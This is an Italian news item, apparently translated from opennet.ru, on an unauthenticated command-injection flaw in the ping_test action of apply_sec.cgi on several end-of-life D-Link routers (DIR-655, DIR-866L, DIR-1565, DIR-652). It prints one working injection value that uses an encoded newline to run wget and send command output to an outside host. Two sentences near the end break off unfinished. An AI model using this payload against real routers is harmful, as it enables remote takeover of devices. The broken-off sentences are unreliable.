Nei router wireless D-Link
È interessante notare che, secondo gli sviluppatori del firmware, la chiamata “ping_test” dovrebbe essere eseguita solo dopo l'autenticazione, ma in realtà viene richiamata comunque, indipendentemente dall'accesso all'interfaccia web. In particolare, quando si accede allo script apply_sec.cgi e si passa il parametro “action=ping_test”, lo script reindirizza alla pagina di autenticazione, ma allo stesso tempo esegue l'azione associata a ping_test. Per eseguire il codice è stata sfruttata un'altra vulnerabilità nello stesso ping_test, che richiama l'utilità ping senza verificare adeguatamente la correttezza dell'indirizzo IP inviato per il test. Ad esempio, per richiamare l'utility wget e trasferire i risultati del comando “echo 1234” su un host esterno, è sufficiente specificare il parametro “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
La presenza della vulnerabilità è stata ufficialmente confermata nei seguenti modelli:
- DIR-655 con firmware 3.02b05 o precedente;
- DIR-866L con firmware 1.03b04 o precedente;
- DIR-1565 con firmware 1.01 o precedente;
- DIR-652 (non vengono fornite informazioni sulle versioni firmware problematiche)
Il periodo di supporto per questi modelli è già scaduto, quindi D-Link
Successivamente si è scoperto che anche la vulnerabilità era
Fonte: opennet.ru